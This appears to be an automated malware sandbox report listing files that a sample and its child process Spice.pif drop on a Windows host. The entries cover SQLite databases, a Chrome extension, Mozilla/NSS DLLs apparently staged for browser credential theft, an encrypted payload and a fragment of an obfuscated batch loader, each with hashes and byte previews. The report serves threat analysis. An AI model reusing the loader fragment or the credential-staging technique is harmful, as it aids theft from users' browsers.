Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFIEHCFIECBGCBFHIJJKEGHIEC

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	modified
Size (bytes):	45352
Entropy (8bit):	0.3940876416121774
Encrypted:	false
SSDEEP:	48:CexI5QurB/IyQTll7DYMrbxIO8VFDYMrSp:SqVdll4xjVG
MD5:	B51CD8F4331276235DFA5BF1EAAF1A9E
SHA1:	E8A9B579E4CDE21510D0C55B7A86417D7A72991D
SHA-256:	7ECF7C676E22ABDEBAE5A0DBBFBBE5A67B98BAAE6257B328B881A0411918A3F0
SHA-512:	DADEC45650D670A49AA4EC40562741DC8A602932181D03B1222AB0B59EA918FC51F1DA9DDB93976AE93C706EEA82DC6F27C218BABDC88B95758425D42984F78B
Malicious:	false
Preview:	7....-........... .g._..<.$..7[/......... .g._..w...D.ISQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGCFBFBGHDGDAKECAKJEHCGDAA

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	4814
Entropy (8bit):	7.909739359753065
Encrypted:	false
SSDEEP:	96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
MD5:	6E6FE97CBC259DB47CD8423141CF35A3
SHA1:	EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
SHA-256:	1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
SHA-512:	9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
Malicious:	false
Preview:	Cr24....t.........0.."0....H.............0.........,.i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.\|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0....H.............0.........]......N..h...A..LY...%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..\|3.....WS2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&....."..}/9y%.......m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8......J5.Z.~....0.Lt\|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

C:\ProgramData\DGDAEHCB

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIIDBGDAFHJDHIDGDGII

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEGCBF

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEGCBFHJDG\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 34cFFMVY3B.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: HFtuDDkdi6.exe, Detection: malicious, Browse Filename: A4eSWqbQPf.exe, Detection: malicious, Browse Filename: N3MZMKV5GN.exe, Detection: malicious, Browse Filename: nJGNa9kHJf.exe, Detection: malicious, Browse Filename: 7PFj8ZyNTr.exe, Detection: malicious, Browse Filename: HpsVE4Pwxn.exe, Detection: malicious, Browse Filename: u7p2rff5aP.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEGCBFHJDG\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 34cFFMVY3B.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: HFtuDDkdi6.exe, Detection: malicious, Browse Filename: A4eSWqbQPf.exe, Detection: malicious, Browse Filename: N3MZMKV5GN.exe, Detection: malicious, Browse Filename: nJGNa9kHJf.exe, Detection: malicious, Browse Filename: 7PFj8ZyNTr.exe, Detection: malicious, Browse Filename: HpsVE4Pwxn.exe, Detection: malicious, Browse Filename: u7p2rff5aP.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEGCBFHJDG\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEGCBFHJDG\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDAFHDH

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDBGHDGHCGHCAAKFIIECFHCFBF

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJJEGHDAECBFHJKEGIJK

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620254876639106
Encrypted:	false
SSDEEP:	12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
MD5:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
SHA1:	F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
SHA-256:	865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
SHA-512:	57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 7% Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\a

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	348094
Entropy (8bit):	7.999496119326081
Encrypted:	true
SSDEEP:	6144:fgygdmxW9wobOq09itcKOrokJ8t5wcvisnrs9QkwC1uBVIkw9+:2dVY9itQrokStrAJuvIg
MD5:	1DC1E211A5797997C9B6C85CC50F6D48
SHA1:	1B29C41DAFBA8A94FC366CBA4977ABCE6A8EE517
SHA-256:	97A11AB47A79A2D2E8C5AAB13220B5C8BE0D48FDFC691BBB77C46F85110170A7
SHA-512:	E79025B9E0E887CD02FE76D71CE51220266BD1C8CCC80B161432F35DA3ECA7C8B6EA8800508728B32748EB96D545AFA4F43D7657FCDC1256A243C6366B82B7BE
Malicious:	false
Preview:	.....7k.....N.C{b.\DH..R.:..X....a...'cR1..j...NkD.0_.\|...Q0o..V..}j....e...s..V..N.fq6.i9..G.........7m..n.8...C....P{5Fuj.....c...".\|....O.U.Z.z./!g.N;r.d.x}...}...cD...'a+1..=vY..r...W.f.cVU8.Z..x.....@..~;.>.I..>y..r........_.[b...qo.l..\.J.U...c...i..9G....]..b.k.DK...g...(...UL.3.7'...W.....7...@...V.<.h-..c...y..F;.>.9.......U......s.x..7.H.74...8....9.wC>.....vG1.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rx...5.<.'.F...h.............W...e.,cW...e.,ckC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.%..,P..Myn.2..t.W........7I....[.W...OT.cW...e.,cm......2.q8.5...x..2).U.j....>.l#...w....i..`\|.....@}.-\|......"I...G..eI..a0f.d=...>Q...K.Y.....L.d.../...... D(N....7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Aboriginal

Download File

Process:	C:\Users\user\Desktop\0dN59ZIkEM.exe
File Type:	data
Category:	dropped
Size (bytes):	101310
Entropy (8bit):	7.998271136344218
Encrypted:	true
SSDEEP:	3072:+hlUcSrsdHrxCDf8GHzm1uQGVM9kXxSv9Rk:+snrs9QkwC1uBVIkw9+
MD5:	EBDA2C7040E8C58FE501E2BEFC215C9B
SHA1:	777CACD0DC15591562323DE74C26BB3BDF1F8EB8
SHA-256:	965B24F99D4905EB4591F3450BB9DD5BD7883D014CAC5CE7F9A8A78C038689B3
SHA-512:	1BA77123472ADDA6374B162C1536171CA3B190FA7053F505C8D4C37E6ABFE0EAF4A972936594D34621885C1F14CE596CB09AD16226734985FCF77AD3BD3839B5
Malicious:	false
Preview:	j.....f..a?\|..5(.PO.;x...E.#.b9..a.......^..Q..p..E..K?..MT..\|....S.. '...hrMs]c}...8.J....wU-_O.....GG>.>..\...j.a..Ii..].._...!y.B....3..^....V...K.z.^.q.....oS...~.+.@F....t".a.iU..eQ[...c.q.#.c.B..z..\..J.K...h....k.U.@\.u./.%r.....a\|B.G....h.=T.wPO.,......[............wd.!..?.c..@....z....#....o.v..&.X.......n.&...)..X"..8...W.+..p{.c.S.1...;g8........K.A.-+{).."J.....3...OP.I.....X.2..ha..s5,.....M.o.0i.g..h........S..88.DjW...F...gu-.......%..N....E.3... ..\.s.,...DN6;lO..#sC.g..3g.$..R.....,..5T~..n..h.Nn...#.;...T..s.........t..p.S.~.[.1."c....Pv..zW ...2...d$R.`pY.(.T.F......1......K.F....N..$Nn..EY&if.B`.;[........KOE.....]9.a.`S..... o.....U.Y?N4.d].R...k....rJF....p.\.h..1.......$....MM?.0.p.I.Sm-/...Dt..3........Xd:.........~&..~...[....QC.....H...X.@k..$K.C.T...O..Q.,.On...W.....f..:py@..I...H...P.x....a..e..j.."n....kK..Qd.3m...W...".~.}.....R..;....C.T.Jj..e...e....X..GWS....Y.F.o \|m....N.`...9*.4.X...O.)...V....(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Automation

Download File

Process:	C:\Users\user\Desktop\0dN59ZIkEM.exe
File Type:	data
Category:	dropped
Size (bytes):	51815
Entropy (8bit):	6.766178172090266
Encrypted:	false
SSDEEP:	768:Br2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8qT4O:12+9BBVgCOa1ZBPaPQaEwo0yv
MD5:	5A6D4A5C98E19A5A228702132DDB17A0
SHA1:	181BA336C9668CAEDA737645536D3CE59AF6D1FE
SHA-256:	08CD81C4D2A2A1A935E70C419C27F469AF624D42DC1F2D24E71E1BB306F9ABAC
SHA-512:	2F51DF588407C83EFE13287E6B33A45108644CBE77117EF93C1BF2A9697FA9E468E3F9843BE7CAE15970996D606012A71295EA5FD872230DAFB59E43C59C58A2
Malicious:	false
Preview:	.]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]........................................k......................^...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...^........................k.................................]...]...e...o...o...o...o...o...n...]...]...i...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...h...]...].......................................................b...]...]...p..............................].......................................................................................]...]...a............................W.....................]...]...]...]..............................q...].............................................................................]...]...]...].......................W.........................]...]...]...]...]..............................`...`..........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bag

Download File

Process:	C:\Users\user\Desktop\0dN59ZIkEM.exe
File Type:	ASCII text, with very long lines (877), with CRLF line terminators
Category:	dropped
Size (bytes):	22869
Entropy (8bit):	5.032392536726604
Encrypted:	false
SSDEEP:	384:KCyCXnbUYiWQI8jc+G+eqlg8byUUh/zZFU8KzKC+C8IUVNJ54xACUVN7T9SoizwN:KErUYijQKlldypSVKCvgV4xLg19AmQd8
MD5:	DC220C71F09BC18A50633B924B64B158
SHA1:	114C82651132BC93E1965B3B38D7DD1E74A540EC
SHA-256:	50AAB160C0370EDCB1C6F967CB17B7C6F5AE7CA01B7EE3EE435659F8E6B57B1A
SHA-512:	4B3B993966C1AF06C06ECE9B02D002F627827E9711B5D9124852D1915DA563D0A576FEE1E5A53A5FFA1727E3110F24C0FDF792C9CA640149838BFE70EFD0E950
Malicious:	false
Preview:	Set Competing=P..JyMandatory Rankings ..bQVSubsidiary Huge Grow Disciplines Renewable Gave Ht Hugh Synthetic ..VpTwenty ..CxSticky Individuals Attacks Converter Pickup ..dodQuantities Animated Photograph Cleared ..Set Mozilla=t..LlHub Unions Inter ..dMKnowing Alt ..soVe ..nRINUnder Move Asus Artist Queensland Spectrum Phys Republic Neil ..FmapTraditional ..QUWhCanvas Blocked Analysts Mardi Warrant Purple Cooling Briefing ..Set Juvenile=n..kfSTMac Isa Available Harm ..fFSQSwitching App Joint Airline Retained Specialists Registration Blvd Individual ..qpTXJournal Differences Varies Lycos Capitol ..keEgSubtle Sri Unauthorized Stakeholders ..pLrCitizens Outstanding Interactive Titled Brisbane Jamaica Condo Guided ..xaFuHerald Amateur Personality Expect Pressed Adolescent Pc Accessibility ..MsYUNormal Investigate ..bPyzSee Antivirus Highland Pets Preserve Sms Cakes Conservation ..Set Trash=A..YAQRAlice Aruba Computing Christianity Red Quickly Molecules Caught ..wPbTobacco Settings Accredite

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bag.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (877), with CRLF line terminators
Category:	dropped
Size (bytes):	22869
Entropy (8bit):	5.032392536726604
Encrypted:	false
SSDEEP:	384:KCyCXnbUYiWQI8jc+G+eqlg8byUUh/zZFU8KzKC+C8IUVNJ54xACUVN7T9SoizwN:KErUYijQKlldypSVKCvgV4xLg19AmQd8
MD5:	DC220C71F09BC18A50633B924B64B158
SHA1:	114C82651132BC93E1965B3B38D7DD1E74A540EC
SHA-256:	50AAB160C0370EDCB1C6F967CB17B7C6F5AE7CA01B7EE3EE435659F8E6B57B1A
SHA-512:	4B3B993966C1AF06C06ECE9B02D002F627827E9711B5D9124852D1915DA563D0A576FEE1E5A53A5FFA1727E3110F24C0FDF792C9CA640149838BFE70EFD0E950
Malicious:	false
